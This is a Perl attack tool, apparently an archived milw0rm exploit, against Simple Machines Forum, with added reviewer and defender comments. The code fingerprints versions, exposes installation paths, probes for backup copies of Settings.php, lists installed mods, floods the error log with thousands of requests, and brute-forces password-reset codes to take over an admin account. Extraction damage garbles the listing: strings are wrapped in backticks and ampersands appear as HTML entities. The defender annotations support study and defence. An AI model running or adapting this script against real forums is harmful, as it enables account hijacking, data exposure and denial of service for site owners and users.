Simple Machines Forum - Destroyer 0.1#!/usr/bin/perl

    use LWP::UserAgent;
    use Getopt::Std;
    use LWP::Simple;
    use HTTP::Request;

#Author: Xianur0
#Uxmal666[at]gmail.com
# Cracks links Password Recovery
# Find Temporary Files executed by mods
# DB function Flood by Error Log
# File Path Disclosure
# List installed Mods (Useful To Find Mods Vulnerable)
# etc. ..

# Entry point: print a banner, take the target URL from the second
# command-line argument, fingerprint the forum, then dispatch on the option
# letter. Every probe is an unauthenticated HTTP request to a fixed path
# under $url, so each one is visible in web server access logs.
#
# NOTE(review): every string in this listing is delimited by backticks and
# the logical-and is printed as an HTML entity. That looks like extraction
# damage from the page this was copied from (quotes and ampersands rewritten)
# rather than the text as authored -- confirm against an archived copy before
# relying on it for analysis. In Perl, backticks are command substitution,
# not string quoting.
print `\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n`;
# Target URL is mandatory; the usage text is the die() message.
my $url = $ARGV[1] || die (`Use: smf.pl [option] [Full URL]
[Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l
Installed Mods List \n-b Find Temporary\n-c  Cracks links Password
Recovery (Recommended Use Proxy)`);
# version() builds the shared user agent and sends the first request. It runs
# before the proxy below is applied, so in access logs the fingerprinting GET
# may arrive from a different source address than the requests that follow.
version();
# Optional third argument, host:port of an HTTP proxy. Not applied here when
# the first argument is -c; crackeador() reads its own proxy argument.
my $proxy = $ARGV[2] || ``;
if($ARGV[0] ne `-c` &amp;&amp; $proxy ne ``) {
$ua->proxy([`http`], `http://`.$proxy);
}

    # Getopt::Std removes the parsed switch from @ARGV and fills %opt; each
    # flag that is set runs one probe routine.
    getopts('fplbc', \%opt);
    crackeador() if $opt{c};
    flood() if $opt{f};
    path() if $opt{p};
    list() if $opt{l};
    temp() if $opt{b};

# Set fixed Accept and Accept-Language headers on the package-global $req.
# Takes no arguments; the caller must have assigned $req beforehand.
# Detection note: the Accept-Language value is the same on every request that
# goes through this helper, and version() sets a constant User-Agent. Together
# they form a weak log signature that an operator can change trivially, so
# path-based detection is more durable than header matching.
sub headers {
$req->header('Accept' => 'text/html');
$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3');
}

# Create the shared LWP user agent, fetch $url and report the SMF version
# advertised in the page footer.
# Side effects: assigns the globals $ua, $req, $res and $version; prints to
# STDOUT. Prints nothing when the request fails or the footer is not found.
# Defender note: the version is scraped from the Powered by SMF footer link.
# Removing or editing that footer only silences this banner; the probe
# routines dispatched from the top level do not consult $version.
sub version {
$ua = LWP::UserAgent->new;
# Constant browser-like User-Agent, reused for every later request.
$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12)
Gecko/20080201 Firefox/2.0.0.12');
$req = HTTP::Request->new(GET => $url);
# NOTE(review): presumably a call to headers(), with the ampersand shown as
# an HTML entity in this listing -- confirm.
&amp;headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
# Capture whatever text follows the words Powered by SMF in the footer link.
if ($html =~ /title=`Simple Machines Forum` target=`_blank`>Powered by
SMF (.*?)<\/a>/){
$version = $1;
print `\n[X] SMF Version: $version\n`;
# NOTE(review): this is a numeric comparison applied to a dotted version
# string; it does not order versions component by component.
if($version < `1.1.7`) {
print `\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X]
http://milw0rm.com/search.php?dong=smf`.$version.`\n\n`;
}
}}}

# Request SSI.php with a bare ssi_layers query parameter and look for a PHP
# Undefined variable notice in the response; the text captured before
# SSI.php is printed as the installation directory.
# Side effects: assigns the globals $req and $res; prints to STDOUT. Prints
# nothing when the HTTP request itself fails.
# Defender note: the match only works when PHP notices are rendered into the
# response body. Sending PHP errors to a log instead of the page removes the
# disclosure this routine looks for. In access logs the probe appears as a
# GET for /SSI.php?ssi_layers.
sub path {
$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers');
# NOTE(review): presumably a call to headers(), with the ampersand shown as
# an HTML entity in this listing -- confirm.
&amp;headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
if ($html =~ /Undefined variable: ssi_layers in <b>(.*?)SSI.php/){
print `[X] Directory: $1\n`;
} else { print `[!] Getting error Directory!\n`;}
}
}

# Send the same GET request 9999 times in a sequential loop and print a line
# per response. The request targets index.php with action=help and an
# array-style page[...] parameter whose key is a fixed string repeated 15
# times.
# Side effects: assigns the globals $texto, $req, $res and $i; prints to
# STDOUT.
# Per the feature list at the top of the file the intent is to flood the
# database through the forum error log. NOTE(review): whether and how the
# forum records this request is not visible in this listing.
# Defender note: the request line is identical on every iteration, so it is
# easy to match and rate-limit at the web tier; capping or pruning the forum
# error log bounds the storage impact.
sub flood {
print `[X] Starting Flood! (Press Ctrl + C To Finish)\n`;
$texto = `Flood!!!!!` x 15;
$req = HTTP::Request->new(GET =>
$url.'/index.php?action=help;page['.$texto.']=loginout');
# NOTE(review): presumably a call to headers(), with the ampersand shown as
# an HTML entity in this listing -- confirm.
&amp;headers;
# One request object is built above and re-sent unchanged on each pass.
for($i = 1; $i<10000; $i++) {
$res = $ua->request($req);
if ($res->is_success) {
print `[-] Sent: `.$i.`\n`;
} else {
print `[!] HTTP Error Query: ` . $res->status_line . `\n`;
}
}
}


# Probe the forum root for three editor backup copies (names ending in a
# tilde) and report each as found or not found.
# Side effects: assigns the globals @temps, $temp, $req and $res; prints to
# STDOUT.
# The only test is a successful HTTP status, so a site that answers unknown
# paths with a 200 page is reported as Found.
# Defender note: a backup copy of a PHP file is usually served as plain text
# rather than executed, which would expose its source; for a settings file
# that presumably includes configuration secrets. Keep editor backups out of
# the web root and deny requests for names ending in a tilde.
sub temp {
@temps=('index.php~','Settings.php~','Settings_bak.php~');
foreach $temp (@temps) {
$req = HTTP::Request->new(GET => $url.`/`.$temp);
# NOTE(review): presumably a call to headers(), with the ampersand shown as
# an HTML entity in this listing -- confirm.
&amp;headers;
$res = $ua->request($req);
if ($res->is_success) {
print `[X] Temporary File Found: `.$url.`/`.$temp.`\n`;
} else {print `[!] Not Found: `.$url.`/`.$temp.`\n`;}
}
}

# Fetch Packages/installed.list from the forum and print one record per line
# of the response, splitting each line on the |^| separator.
# Side effects: assigns the globals $req, $res and $mod; prints to STDOUT.
# Prints nothing when the request fails.
# The field meanings (description, file, name, version) are taken from the
# print labels below; the file format is not otherwise shown in this listing.
# Defender note: the output is an inventory of installed packages with their
# versions, readable without authentication when the Packages directory is
# served directly. Denying web access to that directory removes it.
sub list {
$req = HTTP::Request->new(GET => $url.`/Packages/installed.list`);
# NOTE(review): presumably a call to headers(), with the ampersand shown as
# an HTML entity in this listing -- confirm.
&amp;headers;
$res = $ua->request($req);
if ($res->is_success) {
 my $html = $res->content;
my @htmls = split(`\n`, $html);
foreach $mod (@htmls) {
# The scalar $mod holds the raw line; the array @mod holds its fields.
my @mod = split('\|\^\|', $mod);
print `[X]Package:\nDescription: $mod[0]\nFile:
$url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n`;

}
}
}

# Password-reminder routine, run for the -c option. It re-reads its
# arguments after getopts has removed the switch: forum URL, account name,
# account id, and an optional proxy. It defines three nested helpers and
# then runs mail() followed by brute().
#
# Defender view of the traffic this produces:
#   * one GET of ?action=reminder and one POST to ?action=reminder;sa=mail
#     naming the target account; going by the status text printed below,
#     this asks the forum to send that account a reminder e-mail, so the
#     account owner receives a message nobody requested;
#   * then an open-ended loop of GET + POST pairs against ?action=reminder,
#     each POST carrying a different 10-character code and the constant
#     password string visible in brute().
# Every guess first obtains a new session cookie and sc token, so throttling
# keyed on the session does not slow the loop; limits need to be keyed on
# the target account or the source address.
# NOTE(review): how the forum generates and expires the real code is not
# visible here, so the practical success rate cannot be judged from this
# listing.
sub crackeador() {
$url = $ARGV[0];
$nick = $ARGV[1];
$id = $ARGV[2] || die(`Use: smf.pl -c [URL SMF] [Nick Admin] [ID
Admin] [Proxy:Puerto]\nExample: smf.pl -p
http://www.simplemachines.org/community/ dschwab9 179
www.carlosslim.com:3128\n`);
my $reminder = $url.`?action=reminder`;
my $smf = $reminder.`;sa=setpassword;u=`.$id.`;code=`;
# Optional fourth argument: host:port of an HTTP proxy for all requests below.
my $proxy = $ARGV[3];
if($proxy ne ``) {
$ua->proxy([`http`], `http://`.$proxy);
}

# Fetch the reminder form, scrape the session cookie and the hidden sc
# token from the raw response, then submit the form for the account in $nick.
# Dies when either value cannot be found.
sub mail() {
my $content = HTTP::Request->new(GET => $reminder);
# as_string gives status line, headers and body as one text blob, which is
# why a Set-Cookie header can be matched with a plain regex.
$contenedor = $ua->request($content)->as_string;
if ($contenedor =~ /Set-Cookie: (.*?)
/){
        print `\n[+] SESSION Detected: $1\n`;
$session = $1;
} else { die `[!] SESSION could not be found!\n`;}
if ($contenedor =~ /<input type=`hidden` name=`sc` value=`(.*?)`/){
        print `\n[+] sc Detected: $1\n`;
    $sc = $1;
} else { die `[!] SC could not be found!\n`;}
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
  $req->content_type('application/x-www-form-urlencoded');
  $req->content('user='.$nick.'&amp;sc='.$sc.'&amp;=enviar');
  $req->header('Cookie' => $session);
my $res = $ua->request($req)->as_string;
if(!$res) {exit;}
print `[x]Sent!\n`;

}

# Build one 10-character candidate code from a table of digits and
# lowercase letters, choosing each position with rand().
sub generador() {
my $password = ``;
my @chars = split(` `,
    `0 1 2 3 4 5 6 7 8 9 a b c d e
    f g h i j k l m n o p q r s t
    u v w x y z`);
for (my $i=0; $i < 10 ;$i++) {
    $_rand = int(rand 35);
    $password .= $chars[$_rand];
}
return $password;
}

# Guessing loop. $bucle is never assigned in the visible code, so the while
# condition stays true and the loop ends only through exit or die.
# Each pass costs the forum two requests: a GET for a fresh session and sc
# token, then a POST carrying the candidate code and a constant password.
# That constant string appears in every POST body and is usable as an
# indicator where request bodies are inspected or logged.
sub brute() {
while($bucle ne `finito`) {
$code = generador();
    my $fuente = $reminder.`;sa=setpassword;u=`.$id.`;code=`.$code;
    my $content = HTTP::Request->new(GET => $reminder);
    my $content = $ua->request($content)->as_string;
if ($content =~ /<input type=`hidden` name=`sc` value=`(.*?)`/){
    $sc = $1;
} else { die `[!] SC could not be found!\n`;}
if ($content =~ /Set-Cookie: (.*?)
/){
        print `\n[+] New SESSION Detected: $1\n`;
$session = $1;
} else { die `[!] SESSION could not be found!\n`;}
print `[+] Testing Code: `.$code.`\n`;
my $req = HTTP::Request->new(POST => $reminder.';sa=mail');
  $req->content_type('application/x-www-form-urlencoded');
  $req->content('passwrd1=xianur0washere&amp;passwrd2=xianur0washere&amp;code='.$code.'&amp;u='.$id.'&amp;sc='.$sc);
  $req->header('Cookie' => $session);
  $res = $ua->request($req);
  if ($res->is_success) {
     if($res->content =~ '<input type=`text` name=`user` size=`20` value=`') {
print `[-] Password Changed!\n[x] New password: xianur0washere\nUsername: $1\n`;
exit;
}
} else { die `[!] HTTP response incorrect!\n`;}}}

# Run order: request the reminder first, then start guessing.
print `\n[-] Sending Mail...\n\n`;
mail();
print `\n[-] Attacking code link recovery...\n`;
brute();
}

# milw0rm.com [2009-01-12]
